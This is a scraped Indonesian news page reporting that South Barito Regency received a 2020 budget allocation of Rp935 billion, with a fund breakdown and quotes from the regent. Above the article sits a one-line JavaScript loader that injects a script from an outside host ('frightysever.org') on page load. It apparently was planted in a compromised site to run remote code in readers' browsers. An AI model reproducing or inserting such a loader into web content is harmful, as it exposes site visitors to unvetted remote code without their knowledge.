(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

DIPA Barsel 2020 Capai Rp935 Miliar


BUNTOK, Gubernur Kalteng Sugianto Sabran menyerahkan Daftar Isian Pelaksanaan Anggaran (DIPA) dan dana alokasi Transfer ke Daerah dan Dana Desa (TKDD) tahun 2020.

Bupati Barsel H Eddy Raya Samsuri menerima DIPA tahun anggaran 2020 dengan nilai mencapai Rp935 miliar, di aula kantor Gubernur Kalteng, Senin (18/11).

Adapun rincian DIPA 2020 keseluruhan untuk Barsel antara lain dana hasil bagi pajak Rp 13.165.426, dana bagi hasil sumber daya alam Rp 37.416.699, dana alokasi umum (DAU) Rp 598.743.369, dana alokasi khusus (DAK) fisik Rp 85.517.564, dana alokasi khusus (DAK) non fisik Rp 66.805.274, dana intensif daerah Rp 47.361.291 dan alokasi dana desa Rp 86.161.914.

Bupati Barsel H Eddy Raya Samsuri mengatakan, lewat DIPA 2020 yang diterima sebanyak Rp 935 miliar untuk proses pembangunan di Barsel.

“Jadi lewat dana DIPA yang kita terima inilah yang akan kita jalankan untuk proses pembangunan di Barsel,” kata Eddy Raya kepada Kanalkalimantan.com, usai penyerahan.

Ditambahkannya, lewat penyerahan DIPA ini diharapkan pelaksanaan pembangunan dan pencairan anggaran di Barsel lebih baik dari tahun sebelumnya.

“Karena dengan telah diterimanya DIPA tahun 2020 untuk Barsel, kiranya untuk pelaksanaan kegiatan tahun 2020 di Barsel bisa terlaksana dengan lancar sesuai harapan kita,” pungkas Eddy Raya. (digdo)

Reporter : Digdo
Editor : Bie

 


Desy Arfianty

Recent Posts

Korban Tenggelam di Sungai Martapura Ditemukan Senin Dinihari

KANALKALIMANTAN.COM, BANJARMASIN — Remaja laki-laki yang tenggelam di Sungai Martapura, Kota Banjarmasin ditemukan dalam keadaan… Read More

18 menit ago

Banjir Rob Murung Selong Banjarmasin 407 Jiwa Terdampak

KANALKALIMANTAN.COM, BANJARMASIN - Banjir rob yang menggenangi kawasan Murung Selong, Kelurahan Sungai Lulut, Kota Banjarmasin,… Read More

14 jam ago

Tanggul Halangi Air Keluar di Komplek PWI, Ketua DPRD Banjarmasin Minta Dibongkar

KANALKALIMANTAN.COM, BANJARMASIN - Ketua DPRD Kota Banjarmasin, Rikval Fachruri meninjau banjir rob di komplek Persatuan… Read More

14 jam ago

Banjir di Gang Serumpun Sungai Lulut Masih Selutut

KANALKALIMANTAN.COM, BANJARMASIN — Banjir rob yang menggenangi Jalan Hikmah Banua, Gang Serumpun RT 27, Kelurahan… Read More

15 jam ago

BLK Kalsel Buka Pendaftaran Pelatihan Kerja Tahun 2026

KANALKALIMANTAN.COM, BANJARBARU - Balai Latihan Kerja (BLK) di bawah Dinas Tenaga Kerja dan Transmigrasi (Disnakertrans)… Read More

20 jam ago

Besok, Presiden RI Resmikan 166 Sekolah Rakyat Terpadu di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota Banjarbaru bersiap menyambut kunjungan Presiden Republik Indonesia, Prabowo Subianto berserta… Read More

21 jam ago

This website uses cookies.